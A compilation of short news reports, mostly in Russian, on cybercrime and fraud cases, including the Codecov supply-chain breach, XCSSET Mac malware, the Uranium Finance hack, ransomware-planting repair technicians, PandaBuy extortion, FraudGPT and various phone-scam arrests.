Согласно заявлению Министерства юстиции США, у Карлссона также будет конфискован тайский курорт, который он купил на украденные деньги, и $16.2 млн в качестве выплаты пострадавшим от его действий. В 2019 году он был арестован в Таиланде, где с 2011 года управлял инвестиционной мошеннической схемой Eastern Metal Securities. В ноябре 2019 года подозреваемый был экстрадирован в США.
Карлссон обещал своим жертвам «астрономическую прибыль» на их вложения в BTC и других активах. Однако мошенник потратил деньги инвесторов на покупку дорогостоящей недвижимости и скаковой лошади. Комиссия по ценным бумагам и биржам США (SEC) в прошлом сентябре передала в суд Нью-Йорка дело Карлссона, а в марте этого года он признал свою вину.
В расследовании дела участвовал отдел уголовных расследований Налоговой службы США (IRS), офис юридического атташе ФБР в Таиланде, атташе отдела уголовных расследований IRS в Гонконге и подразделение по борьбе с преступностью Королевской тайской полиции.
• Source: justice[.]gov/opa/pr/cryptocurrency-fraudster-sentenced-money- laundering-and-securities-fraud-multi-million-dollar
[Издание The Record рассказывает](https://therecord.media/south-korean-police- arrest-computer-repairmen-who-made-and-distributed- ransomware/?cf_chl_jschl_tk=abc1eacffe644941e99d199ad236ce7518575869-1624006606-0-AU5dGKLaBCVet1GxbG6kOtwQLPNHn3V8sC- Hw96_121Y86rekk7bOgZDE0GqRUekejusbL5UUHveo_RV6HO0Qu2QhdUsLKXoc0kvLMpB_qDJFxEPpscNCP_FdpGFes6-RFLYEq6J2SVuFHRn9-IJfZz2FHD8Iq0G4JyTCURAND48dPfB6kxzjEqGNK_77lPacHREipgJ2Noi_LovDJMYQYmnOOAfHfOljrX13TctFeWgH8Wt4lzyUDEtVkTEsz7VnVXJT9GflWamhtRFkUhuNgLj- muMpB61xjhqxWO3e2d5txp_LdtYHHirWApdYKnV7bzIIqKY9Ye16clyJIbXwHyFYHG5IiKX1880X8c8U0gemaBdJQ6OO8OBTDyYSpfHjKIA98pJ1KSqlyhWEb4CMywei1C9ihdjahA5ANA9HooS8Mu9T7-DUbphuNcsLOK46g9ElTQB_37SAH9ws8CIQrPo5HRFoWcTkPdaIp7I0OA7Sweg- nPpLCabD1HRR3t8teqei0K45gsCxG3SE0YdiOuA_sf8PQxRPqi16KjrXfgVlSR1WPc1ztIH6tFJD6lTeQ), что на этой неделе южнокорейские правоохранители предъявили обвинения девяти сотрудникам неназванной компании по ремонту компьютеров, которые разрабатывали и устанавливали программы-вымогатели на машины своих клиентов.
В этой мошеннической схеме были задействованы не все сотрудники компании, а лишь девять упомянутых сотрудников из офиса в Сеуле. По информации властей, подозреваемые «заработали» более 360 миллионов вон (примерно 321 000 долларов США), получив выкупы от 40 компаний, которые обслуживали в 2020 и 2021 году.
Мошенники попали в поле зрения полиции, так как некоторые клиенты обратились к правоохранителям за помощью, не сумев самостоятельно справиться с шифровальщиками, проникшими в их системы. Оказалось, что мошенники помогали пострадавшим вести переговоры с хакерами и выплачиваться выкупы, а затем расшифровывать пострадавшие машины.
Следователи объясняют, что в процессе сотрудники сервиса не забывали и о себе: в ходе как минимум 17 инцидентов подозреваемые «подправили» записки с требованием выкупа, увеличив его сумму, чтобы оставить разницу себе. В некоторых случаях выкупы увеличивались в десять раз (например, от 0,8 биткоина до 8 биткоинов), что позволяло мошенникам получать огромную прибыль, если жертва решала заплатить.
Когда эта схема доказала свою прибыльности, мошенники решили пойти еще дальше и создали собственного шифровальщика. В итоге, когда в сервис обращалась очередная компания, пострадавшая от атаки вымогателей, подозреваемые восстанавливали зараженные системы, но внедряли на машины бэкдор, который позже использовали для развертывания собственного шифровальщика. На этот раз всю прибыль «ремонтники» оставляли себе.
И если начала шифровальщика внедряли только в системы компаний, которые уже пострадали от рук вымогателей, то вскоре мошенники стали смелее и начали заражать даже системы постоянных клиентов своей фирмы, которые обращались в сервис с другими проблемами.
Некоторые клиенты, которые подвергались атаками дважды, заподозрили, что происходящее могло быть связано с обращением в сервис. В результате жертвы обратились в полицию, и теперь, после многомесячного расследования власти официально предъявили обвинения как девяти сотрудникам неназванной компании, так и их работодателю.
В настоящее время под стражей остаются только двое подозреваемых из девяти, это мужчины 43 и 44 лет, которые, по мнению следователей, возглавляли всю мошенническую операцию.
Проект децентрализованных финансов Uranium Finance, работающий на Binance Smart Chain, был взломан во время миграции. Хакеры смогли украсть различные токены на $50 млн.
Uranium ― форк децентрализованной биржи Uniswap V2, и сегодня была запланирована миграция на версию протокола 2.1. Что именно произошло во время миграции неизвестно, но на адрес злоумышленников поступило различных токенов на сумму $50 млн. Они получили 80 токенизированных биткоинов ($4.3 млн), 1 800 ETH ($4.7 млн), 17.9 млн BUSD, 5.7 млн USDT, 658 000 токенизированных ADA ($0.8 млн), 26 500 DOT ($0.8 млн) и 34 000 BNB ($18 млн). Также были похищены 112 000 собственных токенов Uranium Finance под названием U92.
«Самое важное ― сохранить средства в BSC. Для этого просьба обратиться в Binance с требованием заблокировать транзакции на адресе злоумышленника. Для этого нужно войти в аккаунт на бирже и отправить жалобу, у них есть специальный механизм», ― написали разработчики Uranium Finance Twitter.
Судя по всему, хакеры нашли в протоколе ошибку, позволяющую любому желающему взаимодействовать с пулами ликвидности и практически опустошать их.
При этом хакеры уже начали выводить токены. Они обменяли ADA и DOT на ETH через децентрализованную биржу PancakeSwap, а затем все полученные ETH на блокчейне BSC были обменяны на версию на Эфириуме через биржу AnySwap. Затем 2 438 ETH были отправлены на миксер Tornado Cash. Также через биржу AnySwap были обменяны все 80 BTC.
Учитывая, что в репозитории Uranium Finance на GitHub был удален код смарт- контрактов, взлом мог стать либо спланированной акцией самих организаторов проекта, либо работой инсайдера. Всего неделю назад был взломан другой протокол DeFi под названием EasyFi. Хакеры получили токенов на $6 млн.
This week, HashiCorp, a notable open-source software tools and infrastructure provider, disclosed that the recent Codecov supply-chain attack had impacted a subset of their Continuous Integration (CI) pipelines.
The company states that as a result of this, the GPG key used by HashiCorp to sign and verify software releases was exposed.
Codecov provides software testing and code coverage services to over 29,000 customers.
On April 1st, Codecov had learned that due to a flaw in their Docker image, threat actors had obtained credentials to the Bash Uploader scripts used by their customers.
The Bash Uploaders were modified with a malicious line of code that exfiltrated environment variables and secrets collected from some customers' CI/CD environments, to an attacker-controlled server.
According to Codecov's investigation, the initial compromise of the Bash Uploader happened on January 31, making this attack last around two months.
In all this, HashiCorp's GPG private key that signs hashes used to verify HashiCorp's product downloads was exposed.
"While investigation has not revealed evidence of unauthorized usage of the
exposed GPG key, it has been rotated in order to maintain a trusted signing
mechanism."
A new GPG keypair (fingerprint shown below) has been published that is to be
used from now on:
C874 011F 0AB4 0511 0D02 1055 3436 5D94 72D7 468F
The older, compromised GPG keypair (fingerprint shown below) has been revoked:
91A6 E7F8 5D05 C656 30BE F189 5185 2D87 348F FC4C
"Existing releases have been validated and re-signed,"
[states](https://discuss.hashicorp.com/t/hcsec-2021-12-codecov-security-event-
and-hashicorp-gpg-key-exposure/23512) HashiCorp in a security event
disclosure.
According to HashiCorp, this incident has only impacted HashiCorp's SHA256SUM signing mechanism.
Example
SHA256SUM files provided with HashiCorp releases
MacOS code signing (notarization), as well as, Windows AuthentiCode signing of
HashiCorp releases, has not been affected by the exposed private key.
Likewise, signing for Linux packages (Debian and RPM) available on releases.hashicorp.com remains unaffected.
However, HashiCorp's advisory does state that their Terraform product is yet to be patched to use the new GPG key.
Terraform is an open-source infrastructure-as-code software tool used for safely and predictably creating, changing, and improving infrastructure.
" Terraform automatically downloads provider binaries during the terraform init operation and performs signature verification during this process," states Jamie Finnigan, HashiCorp's Director of Product security.
The company states that patched releases of Terraform and related tools will be published that use the new GPG key during automatic code verification.
"In the short term, transport-level TLS protects official Terraform provider binaries downloaded during init, and manual verification of Terraform and its providers can be performed with the new key and signatures as described at https://hashicorp.com/security," continues Finnigan in the security advisory.
As a part of its incident response activities, HashiCorp is further
investigating if any other information was exposed from the Codecov incident
and plans on providing relevant updates, as the investigation progresses.
As reported by BleepingComputer earlier this week, hundreds of Codecov
customer networks were reportedly breached due to the Codecov Bash Uploader
compromise.
U.S. federal investigators have also stepped in and are working with Codecov and their customers, to investigate the full impact of the attack.
As such, more security disclosures are expected to come out in the following weeks from different customers.
Software supply-chain attacks continue to be on the rise as they become the latest focus of threat actors.
Just yesterday, BleepingComputer reported that the Passwordstate enterprise password manager used by many Fortune 500 customers was hacked in a supply- chain attack.
A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps.
XCSSET came into the spotlight in [August
2020](https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--
infects-xcode-projects--uses-0-days.html) after it was found to spread via
modified Xcode IDE projects, which, upon the building, were configured to
execute the payload. The malware repackages payload modules to imitate
legitimate Mac apps, which are ultimately responsible for infecting local
Xcode projects and injecting the main payload to execute when the compromised
project builds.
XCSSET modules come with the capabilities to steal credentials, capture
screenshots, inject malicious JavaScript into websites, plunder user data from
different apps, and even encrypt files for a ransom.
Then in March 2021, Kaspersky researchers [uncovered](https://securelist.com/malware-for-the-new-apple-silicon- platform/101137/) XCSSET samples compiled for the new Apple M1 chips, suggesting that the malware campaign was not only ongoing but also that adversaries are [actively](https://thehackernews.com/2021/02/first-malware- designed-for-apple-m1.html) [adapting](https://thehackernews.com/2021/02/new- silver-sparrow-malware-infected.html) their executables and porting them to run on new Apple Silicon Macs natively.
[](https://thehackernews.com/images/-i139eBbfU_g/YH1W7-F_sgI/AAAAAAAACS4/1fzc12bCu5sD-
ryOjLQVMqj916HNjMiKACLcBGAsYHQ/s0/hacker.jpg)
The latest research by Trend Micro shows that XCSSET continues to abuse the
development version of the Safari browser to plant JavaScript backdoors onto
websites via Universal Cross-site Scripting (UXSS) attacks.
"It hosts Safari update packages in the [command-and-control] server, then downloads and installs packages for the user's OS version," Trend Micro researchers [said](https://www.trendmicro.com/en_us/research/21/d/xcsset- quickly-adapts-to-macos-11-and-m1-based-macs.html) in an analysis published on Friday. "To adapt to the newly-released Big Sur, new packages for 'Safari 14' were added."
In addition to trojanizing Safari to exfiltrate data, the malware is also
known for exploiting the [remote debugging
mode](https://www.trendmicro.com/en_us/research/20/i/xcsset-update-browser-
debug-modes-inactive-ransomware.html) in other browsers such as Google Chrome,
Brave, Microsoft Edge, Mozilla Firefox, Opera, Qihoo 360 Browser, and Yandex
Browser to carry out UXSS attacks.
What's more, the malware now even attempts to steal account information from
multiple websites, including cryptocurrency trading platforms Huobi, Binance,
NNCall.net, Envato, and 163.com, with abilities to replace the address in a
user's cryptocurrency wallet with those under the attacker's control.
XCSSET's mode of distribution via doctored Xcode projects poses a serious threat, as affected developers who unwittingly share their work on GitHub could pass on the malware to their users in the form of the compromised Xcode projects, leading to "a [supply-chain-like attack](https://thehackernews.com/2021/03/hackers-infecting-apple-app- developers.html) for users who rely on these repositories as dependencies in their own projects."
ByteDance, the company behind TikTok, agreed to pay $92 million in a
settlement to U.S. users. The settlement has yet to be approved by a federal
judge. The Chinese firm was accused to have failed to get the users’ consent
to collect data in compliance with the Illinois biometric privacy law.
Illinois is the only state that establishes penalties for any violation of
data collection rules, it allows class actions against those companies that
violate the law. Illinois, Texas, and Washington, are the only US state with
specific laws that discipline the use of biometric data, but only the former
doesn’t permit individual lawsuits.
“While we disagree with the assertions, rather than go through lengthy litigation, we’d like to focus our efforts on building a safe and joyful experience for the TikTok community,” reads an email[statement](https://apnews.com/article/technology-lawsuits-biometrics- illinois-00be8815636b8f69d2742637bc1c4f1f#:~:text=SAN%20FRANCISCO%20(AP)%20%E2%80%94%20TikTok%27s,a%20strict%20Illinois%20privacy%20law.) issued by TikTok.
В России в тестовом режиме запущен онлайн-сервис «Национальный
мультисканер» для проверки файлов на вредоносное
ПО. Этот сервис позиционируется в качестве аналога ИБ-платформы VirusTotal,
которая принадлежит Google.
Этот проект является частью новой ИБ- системы противодействия вредоносному ПО и выявлению уязвимостей, которая разрабатывается под руководством Минцифры.
В настоящее время сервис «Национальный мультисканер» осуществляет проверку
файлов с помощью антивирусов от «Лаборатории Касперского»,
Dr.Web и AVSoft.
Сообщается, что сервис поддерживает работу с браузерами Google Chrome, Mozilla
Firefox, Microsoft Edge, Safari, «Яндекс Браузер» и Atom.
Разработчики проекта рекомендуют использовать браузеры с поддержкой российских
сертификатов («Яндекс Браузер» или Atom). Также предлагается самостоятельно
установить сертификаты безопасности Минцифры на «Госуслугах».
Работа с мобильными браузерами в сервисе не поддерживается. Размер файла,
отправляемого на проверку, не должен превышать 256 МБ.
«Национальный мультисканер» предлагает два уровня доступа: анонимный и
зарегистрированный пользователь. Анонимные пользователи могут отправлять файлы
на проверку статическими методами и получать минимальные отчеты.
Зарегистрированные пользователи получают доступ к расширенным функциям, а
именно: возможность отправлять файлы на проверку статическими или
динамическими методами, указывать варианты проверки файлов, просматривать
полные отчеты о проверке файла.
Результаты анализа в сервисе «Национальный мультисканер» представлены в виде графического элемента, разделенного на три равные части. Каждая часть соответствует оценке одной из систем-участников проекта («Лаборатория Касперского», Dr. Web, Athena).
Для максимальной наглядности разработчики проекта использовали цветовую кодировку. Зелёный цвет сигнализирует о том, что файл признан безопасным, оранжевый – файл определен как недоверенный, серый – неидентифицируемый.

На Филиппинских островах нашли секретные больницы с пластической хирургией для преступников
Целую сеть клиник, специализирующихся на пластической хирургии обнаружили на Филиппинах. По данным BBC, они предоставляют свои услуги членам мафии и мошеннических группировок. Два месяца назад в ходе полицейского рейда в одной из таких больниц изъяли инструменты для трансплантации волос и отбеливания кожи, а также зубные импланты.
"С помощью всего этого можно создать совершенно нового человека", — сказал представитель президентской комиссии по борьбе с организованной преступностью Уинстон Джон Касио.
По его словам, среди клиентов клиники есть представители онлайн-казино. Однако в полиции заявляют также о торговцах людьми и телефонных мошенниках. В ходе рейда были арестованы трое врачей — двое из Вьетнама и один из Китая, а также китайский фармацевт и вьетнамская медсестра. Ни один из них не имел лицензии на работу на Филиппинах.
Власти также обнаружили аппарат для гемодиализа, эта находка позволяет предположить, что в этом учреждении площадью около 400 квадратных метров помимо пластической хирургии проводились и другие медицинские процедуры.
Представители e-commerce-платформы PandaBuy сообщили СМИ, что выплатили выкуп хакерам, чтобы предотвратить утечку украденных пользовательских данных. Однако на этой неделе те же хакеры снова начали вымогать у компании деньги.
PandaBuy — это торговая площадка, позволяющая пользователям из разных стран мира приобретать товары из Китая, например, с Tmall, Taobao и JD.com, которые не осуществляют международные отправления.
В марте 2024 года хакер под ником Sanggiero опубликовал около трех миллионов строк данных, украденных у PandaBuy. Тогда были раскрыты имена клиентов, номера телефонов, адреса электронной почты, IP-адреса, почтовые адреса и детали заказов. Злоумышленник заявлял, что ему удалось похитить эти данные, используя несколько критических уязвимостей в API PandaBuy.
В то время Pandabuy предпочла не делать никаких публичных заявлений, а
пользователи сообщали о том, что компания даже пытается удалять сообщения
клиентов о взломе в Discord и на Reddit.
В начале текущей недели, 3 июня 2024 года, тот же злоумышленник выставил на
продажу всю БД, которую он ранее похитил у Pandabuy, за 40 000 долларов США.
По его словам, в общей сложности дамп содержит 17 млн строк.
[](https://xakep.ru/wp-
content/uploads/2024/06/463488/pandabuy1.jpg)
На этот раз Sanggiero не предоставил образцы дополнительных данных о клиентах
платформы, но опубликовал скриншоты с конфиденциальной информацией о
сотрудниках компании, включая электронную почту и пароли.
Как теперь сообщили представители Pandabuy, компания уже заплатила хакеру некую сумму, чтобы прекратить утечку данных. При этом в компании отметили, что хакер мог поделиться данными с другими лицами, поэтому Pandabuy не намерена сотрудничать с ним далее.
«В настоящее время мы не можем продолжать выплачивать хакеру деньги из-за замороженных средств, а данные, которые он сливает, те же самые, что и в прошлый раз. Наш технический отдел подтвердил, что после первой утечки все бреши были устранены. И, насколько нам известно, злоумышленник тайно продал данные другим преступникам, уже после того, как заключил с нами сделку. Мы не можем продолжать сотрудничать с ним в будущем», — заявили в компании.
Click to expand...
В Виннице правоохранители задержали членов банды, которые представлялись банковскими служащими и обокрали десятки граждан из разных регионов на сумму более полумиллиона гривен. Об этом сообщает пресс-служба МВД.
Преступную схему создал и организовал 33-летний осужденный, который отбывает наказание за имущественные и наркопреступления в Винницкой исправительной колонии. Кроме главаря, в состав банды входило семь участников, в том числе другие заключенные.
Мошенники, находясь в местах лишения свободы, обзванивали украинцев и, представляясь сотрудниками службы безопасности банка, выманивали их личные данные. После этого они переводили деньги потерпевших на счета своих подельников на свободе. Те снимали наличные и передавали их в тюрьму.
Во время проведения обысков в тюремных камерах полицейские изъяли сим-карты, мобильные телефоны, банковские карты, "бухгалтерские" записи с карточными счетами и доходами.
Правоохранители возбудили уголовное дело по статье о мошенничестве, совершенном в крупных размерах или путем незаконных операций с использованием электронно-вычислительной техники (ч. 3 ст. 190 УКУ). Злоумышленникам грозит до 8 лет лишения свободы.
Калининский районный суд г. Чебоксары Чувашской Республики вынес обвинительный приговор четверым жителям Марий Эл, признанным виновными в серии мошенничеств.
Их противоправная деятельность была пресечена осенью 2021 года оперативниками МВД по Чувашской Республике, которые обнаружили в арендованной сообщниками квартире кол-центр для обмана иностранных граждан, мечтавших о знакомстве с россиянками.
Полицейские изъяли ноутбуки, сотовые телефоны, множество банковских и сим- карт. Все это, по версии следствия, использовалось для хищения денежных средств путём обмана у зарубежных женихов. Мошенники от имени потенциальных невест вели переписку, соглашались приехать и заключить брак, затем получали от иностранцев крупные суммы для покрытия расходов, после чего прекращали общение с женихами.
Оперативники нашли в изъятой у мужчин оргтехнике адреса электронной почты трёх жителей городов Ухани, Синина и Гуаньчжоу Китайской Народной Республики в возрасте от 42 до 56 лет, у которых злоумышленники похитили в общей сложности 3,5 млн рублей. Следователь СУ УМВД России по г. Чебоксары опрашивала потерпевших по Интернету.
Подсудимые приговорены к лишению свободы на срок от 3 лет 4 месяцев до четырёх с половиной лет в колонии общего режима. Осужденные, находившиеся под подпиской о невыезде и надлежащем поведении, были взяты под стражу в зале суда.
Ущерб потерпевшим им предстоит возместить в солидарном порядке в полном объеме. На оргтехнику и недвижимость фигурантов по ходатайству следствия был наложен арест.
Федеральное бюро расследований (ФБР) США разбирается в деле, связанном с
киберпреступной группировкой Comm, члены которой предположительно причастны к
общенациональной волне сваттинга, захлестнувшей американские школы и
университеты в начале 2023 года. В мае ФБР арестовало как минимум одного
предполагаемого членов группы — Брейдена Уильямса (Braiden Williams); не
исключен арест еще одного предполагаемого участника объединения.
В мае полицейское управление Эмблера (штат Пенсильвания) связалось с ФБР в
связи с многочисленными угрозами взрывов бомб по всей стране. Они были сделаны
от имени 15-летней девочки, которую ФБР называет в своих письменных показаниях
«Жертвой А».
«В сотни школ и университетов были разосланы электронные письма с описанием предполагаемых планов Жертвы А по совершению актов массового насилия. Эти электронные письма вызвали серьезные сбои в работе школ и университетов по всей стране, особенно потому, что они пришлись на выходные, когда во многих школах проводились выпускные», — говорится в письменных показаниях специального агента ФБР Закари Фуллера (Zachary Fuller).
Сестра Жертвы А, названная в материалах следствия «Жертвой Б» под присягой заявила, что к этим атакам причастны члены группировки Comm. Ее члены коммуницировали с помощью чатов в Discord и Telegram, где координировали преступную деятельность, включавшую кражу криптовалюты, сваттинг, кибервзломы юридических лиц, а также физическое насилие. Наиболее серьезных размах, по данным ФБР, приняла деятельность одного из подразделений Comm под названием ACG. Оно, по данным расследования Motherboard, занималось еще и доксингом жертв.
ACG ведет свою деятельность как минимум с лета 2021 года. Арестованный Уильямс помогал киберпреступникам в махинациям с сим-картами и обналичиванием сотен тысяч долларов. Он рассказал агентам ФБР, что тратил заработанные таким образом деньги преимущественно на машины — Dodge Challenger 2020 года, Ford Mustang 2015 года и Dodge Challenger 2016 года, — а также на поездку в Европу.
Жертва А общалась с Уильямсом с осени 2022 года, когда он уже был задержан за махинации с сим-картами, но выпущен под залог. Вскоре после этого он нарушил условия освобождения и был заключен под домашний арест. В этот момент Жертва А, узнав о проблемах собеседника с законом, прекратила общение, однако столкнулась с волной незапрашиваемой доставки еды на дом, а потом и с физическим давлением, которое выражалось в попытке двух «спортиков» разбить кирпичами ее входную дверь. Именно эти инциденты помогли ФБР узнать о существовании ACG и Comm.
source: vice.com/en/article/k7zbma/the-comm-acg-group-linked-to-nationwide- swatting
В правоохранительных органах ТАСС сообщили, что один из пострадавших — бывший замглавы Росприроднадзора Олег Митволь, который был задержан в июне 2022 года по подозрению в хищении 900 млн руб.
По версии следствия, ранее судимый житель Белгородской области, находящийся в местах лишения свободы, с помощью переписки в мессенджере управлял действиями своего сообщника – жителя Екатеринбурга. В 2022 году он организовал изготовление поддельных паспортов, с помощью которых заказал перевыпуск сим- карт с номерами телефонов потерпевших.
Таким образом фигуранты получили доступ к банковским приложениям, перевели деньги с чужих счетов и обналичили их. У четырех граждан похищено в общей сложности 89 млн рублей.
Conceptworld Corporationзанимается дистрибьюцией софта:
Spoiler: Notezilla
Позиционирует себя как менеджер цифровых заметок со своей экосистемой в т.ч. с доступом для 3-их лиц
Spoiler: RecentX
Предоставляет быстрый запуск и доступ к файлам, папкам и приложениям Windows в т.ч. к буферу обмена.
Spoiler: Copywiz
Быстрое и гибкое приложение для резервного копирования файлов Windows.
Контроль при работе с файлами в окнах. Автоматизация задач.
Не так давно
исследователи[Rapid7](https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=http://www.rapid7.com/&ved=2ahUKEwiP_vGNsJCHAxXLFxAIHeQsCYkQ-
TAoAHoECDAQAQ&usg=AOvVaw0JAGi_xbG5tHnbkjLb9yXv) выяснили, что все продукты, о
которых написано выше, имели связь с установочными пакетами, которые в свою
очередь были заражены зловредами.
[Подробнее](https://www.rapid7.com/blog/post/2024/06/27/supply-chain-
compromise-leads-to-trojanized-installers-for-notezilla-recentx-copywhiz/)
24 июня Conceptworld узнали от Rapid7 об этой проблеме и в течении 12 часов
исправили, заменив на легитимные копии.
Spoiler: Взлом/Внедрение/Заражение
Чтобы скрыть зловреда там, где пользователи могли его загрузить,
злоумышленники объединили легитимные установщики ПО компании Conceptworld со
своими собственными(малварью).
Как злоумышленники добились такого "успеха" - неизвестно.
С технической точки зрения, чтобы заразить ПО компании необходимо иметь
возможность обмениваться файлами на сервере, на котором размещаются загрузки
данного ПО.
Полученные установочные пакеты были неподписанными, и очень внимательный
пользователь мог заметить, что размер загруженного файла превышал размер,
указанный на веб-сайте компании (благодаря вредоносному ПО и его зависимостям)
В противном случае мало кто мог бы указать на то, что что-то не так.
После первоначального запуска пользователь увидит только всплывающее окно от
законного установщика, а не от вредоносного.
Spoiler: О Зловреде
Данное вредоносное ПО - "dllFake"
dllFake принадлежит к неназванному семейству вредоносных программ.
Распространялся данный зловред как минимум с января.
Малварь крадет данные криптокошельков и браузеров, также там встроен кейлогер.
В Каменском районе полицейские провели ряд санкционированных обысков в помещениях, в которых действовали подпольные call-центры, которые выманивали деньги у людей. Во время них изъяли порядка 150 единиц техники. Об этом сообщили на сайте Нацполиции Днепропетровской области.
Ежедневно работники сети подпольных call-центров по прописанному сценарию звонили людям и выманивали у них деньги. Офисы мошенников были расположены в нежилых помещениях на территории Каменского района и действовали в закрытом режиме. «Сотрудников» обеспечили компьютерной техникой и комфортными условиями работы.
18 марта в «филиалах» полицейские провели следственные действия, во время которых изъяли 135 компьютеров и 20 мобильных телефонов. Всю технику отправили на экспертизу. Досудебное расследование продолжается. Правоохранители разыскивают организатора незаконного бизнеса и устанавливают сумму нанесённого ущерба.
Компания Google ввела в строй новый сервис OSV (Open Source Vulnerabilities), предлагающий доступ к базе данных с информацией об уязвимостях в открытом ПО. Сервис предоставляет API, позволяющий автоматизировать формирование запросов для получения информации об уязвимостях, с привязкой к состоянию репозитория с кодом. Уязвимостям присваиваются отдельные OSV-идентификаторы, которые дополняют CVE расширенной информацией. В частности, в базе OSV отражён статус исправления проблемы, указаны коммиты с появлением и исправлением уязвимости, диапазон подверженных уязвимости версий, ссылки на репозиторий проекта с кодом и уведомление о проблеме.
Основной целью создания OSV является упрощение процесса информирования мэйнтейнеров пакетов об уязвимостях, благодаря точному определению версий и коммитов, которые затрагивает проблема. Присутствующие данные позволяют на уровне коммитов и тегов отследить проявление уязвимости и проанализировать подверженность проблеме производных продуктов и зависимостей. Например, API позволяет запросить информацию о наличии уязвимостей по номеру коммита или версии программы.
В настоящее время в базе присутствуют около 25 тысяч проблем, выявленных в процессе автоматизированного fuzzing-тестирования в системе OSS-Fuzz, охватывающего код более 380 открытых проектов на языках C/C++. В будущем к БД планируется подключить дополнительные источники информации об уязвимостях. Например, ведётся работа по интеграции информации об уязвимостях в проектах на языке Go, а также экосистемах NPM и PyPl.
• Source: <https://opensource.googleblog.com/2021/02/launching-osv-better- vulnerability.html>
• Source: https://osv.dev/list
По данным компании [Netenrich](https://netenrich.com/blog/fraudgpt-the- villain-avatar-of-chatgpt), в даркнете и в Telegram-каналах активно рекламируется новый ИИ-инструмент для преступников под названием FraudGPT. Его авторы утверждают, что он предназначен для создания фишинговых электронных писем, инструментов для взлома, кардинга и так далее.
Исследователи рассказывают, что подобно обнаруженному недавно WormGPT, этот чат-бот предназначен для киберпреступников. FraudGPT рекламируется как альтернатива ChatGPT без каких- либо ограничений как минимум с 22 июля 2023 года. Подписка на него стоит 200 долларов в месяц (1000 долларов за полгода или 1700 долларов за год). Но пока неясно, на базе какой именно LLM построен этот чат-бот.
[](https://xakep.ru/wp-
content/uploads/2023/07/431030/fraud-bot-dark-web.jpg)Реклама FraudGPT
Автор заявляет, что инструмент можно использовать для написания вредоносного
кода, создания необнаруживаемой малвари, поиска утечек и уязвимостей. Также
заявлено, что FraudGPT якобы уже имеет более 3000 подтвержденных продаж и
отзывов.
Примеры работы FraudGPT, в которых он составляет фишинговое письмо или пишет код для скамерской страницы, замаскированной под Bank of America, можно увидеть ниже.
[](https://xakep.ru/wp-
content/uploads/2023/07/431030/spam-text-example.jpg)
[](https://xakep.ru/wp-
content/uploads/2023/07/431030/working-code-example.jpg)
«Со временем преступники будут находить все новые способы расширения своих преступных возможностей с помощью изобретенных нами инструментов. Пока организации создают ChatGPT (и другие инструменты) с соблюдением этических норм, использование тех же технологий без соблюдения норм не представляет особого труда [для хакеров]», — подытоживают специалисты Netenrich.
Click to expand...
(c) Мария Нефёдова
В рамках операции #LeakTheAnalyst хакеры предположительно взломали компанию F5
Networks и опубликовали данные ее клиентов.
Хакерская группировка 31337, похоже, снова вернулась почти через пять лет
затишья. В 2017 году она запустила операцию #LeakTheAnalyst, в ходе которой
похищала и публиковала данные ИБ-компаний. Самой нашумевшей утечкой
#LeakTheAnalyst является публикация персональной информации и рабочих
документов старшего аналитика Mandiant (подразделение компании FireEye) Ади
Перетца (Adi Peretz).
17 января 2022 года на Pastebin и форуме Raid появилось первое сообщение от
нового зарегистрированного пользователя, гласившее: «Наконец-то в понедельник
хакеры LeakTheAnalys 31337 вернутся снова спустя пять лет. Ждите новых
взломов…».
В сообщении были представлены ссылки на YouTube-видеоролик о деятельности
группировки (в настоящее время уже удален), статью о ней в «Википедии» (в
настоящее время уже удалена) и давнюю утечку FireEye. Кроме того, хакеры
попросили подписчиков проголосовать, какая ИБ-компания станет их следующей
жертвой.
Вероятно, возродившаяся 31337 действительно сдержала свое слово. 31 января на
странице DarkTracer: DarkWeb Criminal Intelligence в Twitter появилось
сообщение о том, что хакеры взломали некую ИБ-компанию и опубликовали ее
данные. В частности, утечка предположительно содержит документы клиентов
компании из военного сектора Великобритании.
Хотя DarkTracer: DarkWeb Criminal Intelligence не раскрывает название
потенциально пострадавшей компании, а на опубликованном скриншоте ее название
размыто, судя по твитам , «гуляющим» по Twitter, речь идет о F5 Networks.
По словам пользователя Twitter под псевдонимом Totale Realname, опубликованные
группировкой данные не представляют особой ценности. В утечке представлена
информация касательно инфраструктуры LDAP компании, в том числе некоторые
имена пользователей.
«Ни хэшированных, ни открытых паролей, никаких файлов из SMB, никакой
персонально идентифицируемой информации пользователей. Не оправдало ожиданий»,
В Минской области после разговоров с лжесотрудниками банков две женщины лишились почти Br80 тыс. Об этом сообщила официальный представитель УСК по Минской области Елена Крупенина.
"Динамика преступности в сфере высоких технологий показывает стремительный рост преступлений, квалифицируемых по ст.212 (хищение путем использования компьютерной техники) УК. Это связано и с модернизацией способов совершения таких преступлений, и с тем, что граждане продолжают доверять звонящим им "сотрудникам банка". Так, за три месяца текущего года следователи Минской области возбудили 821 уголовное дело этой категории, что почти в 4 раза больше, чем за аналогичный период 2020 года (209 уголовных дел)", - рассказали в СК.
К примеру, днем 30 марта злоумышленник позвонил через Viber 66-летней жительнице Борисова и представился сотрудником службы безопасности банка. Он сообщил, что для пресечения хищения с банковской платежной карточки женщине необходимо установить определенное приложение удаленного доступа, сообщить коды карты и прислать скриншоты из мобильного банкинга, что она и сделала. Позже, заподозрив неладное, пенсионерка направилась в банк и при проверке обнаружила, что с ее карт-счета пропало почти Br40 тыс.
Еще один подобный случай произошел днем ранее в Мядельском районе. В то время, когда 40-летняя гражданка Казахстана отдыхала в белорусском санатории, ей по Viber позвонил неизвестный мужчина. В телефонном разговоре он также сказал, что необходимо установить приложение удаленного доступа. После этого с карт- счета потерпевшей при аналогичных обстоятельствах было похищено Br38 тыс.
Действия неизвестных в обоих случаях квалифицированы по ч.4 ст.212 (хищение путем использования компьютерной техники, сопряженное с несанкционированным доступом к компьютерной информации, в особо крупном размере) УК.
Издание Bleeping Computer сообщило, что на сайте хакеров, которым принадлежит шифровальщик Clop, были опубликованы данные, украденные из сетей университетов Колорадо и Майами. В частности, на сайте появилась скриншоты информации об успеваемости и номерах социального страхования студентов, финансовые документы университета Колорадо, информация о зачислениях и биографические данные студентов, медицинские записи, демографические отчеты и электронная таблица с адресами электронной почты и номерами телефонов студентов университета Майами.

